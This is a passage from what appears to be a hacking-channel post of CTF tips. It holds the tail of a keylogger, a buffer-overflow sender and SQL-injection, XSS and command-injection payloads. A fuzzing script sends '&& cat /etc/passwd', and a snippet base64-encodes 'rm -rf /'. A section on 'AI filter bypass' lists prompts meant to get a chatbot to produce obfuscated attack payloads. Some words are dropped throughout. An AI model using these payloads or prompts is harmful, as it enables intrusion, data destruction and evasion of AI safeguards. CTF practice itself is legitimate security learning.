               print(f"Special key {key} pressed")

       with keyboard.Listener(on_press=on_press) as listener:
           listener.join()
       

#### 4. Exploit Development:
- Use tools like Metasploit or custom scripts to simulate the exploitation phase.
- Example of a buffer overflow simulation (basic concept):

     import socket

     target_ip = "127.0.0.1"
     target_port = 9999
     payload = b"A" * 1024  # Overflow buffer size

     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     s.connect((target_ip, target_port))
     s.send(payload)
     s.close()
     

#### 5. AI-assisted Malware Analysis:
- Dynamic Analysis: Use sandboxing tools like Cuckoo Sandbox to observe malware behavior in a controlled environment.
- Static Analysis: Utilize AI models to classify potential threats from a binary.

#### 6. Reverse Engineer the Challenge:
- Use tools like IDA Pro or Binary Ninja to decompile and analyze binaries.
- Example: Identifying a hardcoded key in a binary:
- Use Ghidra to navigate to the main function and identify key variables.

#### 7. Test with Custom AI Scripts:
Automate solving repetitive tasks:
- Password Cracking:
- Use AI to brute force or pattern match probable passwords.
- Example: Use hashcat for password recovery.

- Web Exploitation:
- Automate SQL injection:

       import requests

       target_url = "http://example.com/login"
       payload = {"username": "' OR 1=1 --", "password": ""}
       response = requests.post(target_url, data=payload)
       print(response.text)
       

#### 8. Validate and Optimize:
- Use AI tools to simulate attack scenarios and validate success.
- Example: Use machine learning models for detecting evasion in traffic.

---

### Recommendations and Guidelines:
- Focus on solving s ethically and using skills for legitimate purposes like penetration testing or cybersecurity research.
- Follow rules to ensure fair play and improve your knowledge responsibly.
- Leverage tools like AI models for accelerating repetitive tasks, but always align their use with ethical guidelines.

If you’re facing specific challenges in a , feel free to describe them, and I'll help guide you through solving them!

🦑 Example AI Filter Bypass

Ai gives us prompts to bypass his filters🫠

Crafting prompts or solutions to bypass ethical filters in a scenario requires careful handling to ensure compliance with ethical guidelines, lawful practices, and the intended educational purposes of the challenge. Here's how to approach solving s using AI responsibly:

---

### 1. Understand the Challenge
- Identify Filters: What type of filter or protection is in place? (e.g., WAF, input validation, rate limits).
- Analyze the Scope: Are you working with web input, network traffic, or system-level constraints?

---

### 2. AI-Assisted Prompts for Analysis
Leverage AI tools like ChatGPT, GPT-4, or custom LLMs to assist in analyzing and solving . Below are ethical and focused prompts:

#### Input Validation or WAF Bypass
- Prompt:
- *"Generate a list of obfuscated SQL payloads to test input validation mechanisms, ensuring they align with ethical penetration testing practices."*
- *"How can I encode payloads to bypass basic web filters while remaining within educational use?"*

#### Payload Generation for Testing
- Prompt:
- *"What are effective URL-encoding methods to test a web application's XSS filter?"*
- *"Explain how base64 encoding can be applied to payloads for safe testing of filters in s."*

#### Analyzing Network or Application Behavior
- Prompt:
- *"Suggest methods to analyze rate-limiting strategies in a web application during a ."*
- *"What are common header manipulations that can help test a web firewall in a controlled environment?"*

---

### 3. Practical AI-Assisted Payload Creation
Below are some examples of payloads and bypass techniques for testing in s, ensuring lawful use:

#### SQL Injection (Obfuscated Inputs)
- AI-generated prompt:
*"Craft an SQL injection payload that uses hex encoding or alternative comment syntax to bypass basic filters."*
- Example:

  ' OR 1=1;-- 
  

#### XSS (Input Sanitization Bypass)
- AI-generated prompt:
*"Provide an XSS payload that utilizes uncommon attributes or event handlers to bypass sanitization filters."*
- Example:

  <img src="x" onerror="alert('')">
  

#### Command Injection (Encoding Payloads)
- AI-generated prompt:
*"Explain how to encode command injection payloads to evade simple validation mechanisms."*
- Example:

  ; ls -la;
  

---

### 4. AI-Assisted Automation
#### Testing HTTP Parameters
- Prompt:
*"Generate Python code for fuzzing HTTP parameters using a predefined payload list in a environment."*
- Code:

  import requests

  target_url = "http://example.com/vulnerable-endpoint"
  payloads = ["' OR 1=1 --", "<script>alert(1)</script>", "&& cat /etc/passwd"]

  for payload in payloads:
      response = requests.get(target_url, params={"input": payload})
      print(f"Payload: {payload}, Response: {response.status_code}")
  

#### AI-Based Encoding
- Prompt:
*"Explain how to encode attack payloads using techniques like URL encoding or base64 to test input filters."*
- Code Example:

  import base64

  payload = "rm -rf /"
  encoded_payload = base64.b64encode(payload.encode()).decode()
  print(f"Encoded Payload: {encoded_payload}")
  

---

### 5. Top AI Prompts for Problem-Solving in s
Here are adaptable prompts for specific challenges:
1. Input Validation Bypass:
*"What are common bypass techniques for input validation using encoding, transformations, or special characters?"*
2. Filter Detection:
*"How can I use timing analysis to detect the presence of a web application firewall in a setting?"*
3. Automation Strategies:
*"Provide a Python script for automating brute-force testing of input fields while respecting ethical boundaries."*
4. Reverse Engineering Assistance:
*"Explain how to identify hardcoded secrets in a binary file using reverse engineering tools."*
5. Advanced Obfuscation:
*"What are creative ways to obfuscate payloads for educational while maintaining execution?"*

---

🦑Useful ChatGPT prompts

https://github.com/f/awesome-chatgpt-prompts/blob/main/prompts.csv

🦑 Setup a 2024 Drupal vulnerability:

After installing the drupal application the developer can change the hash_salt variable on line 268 in the /sites/default/settings.php file. As advised in the example the developer can use a file for this by using the file_get_contents function: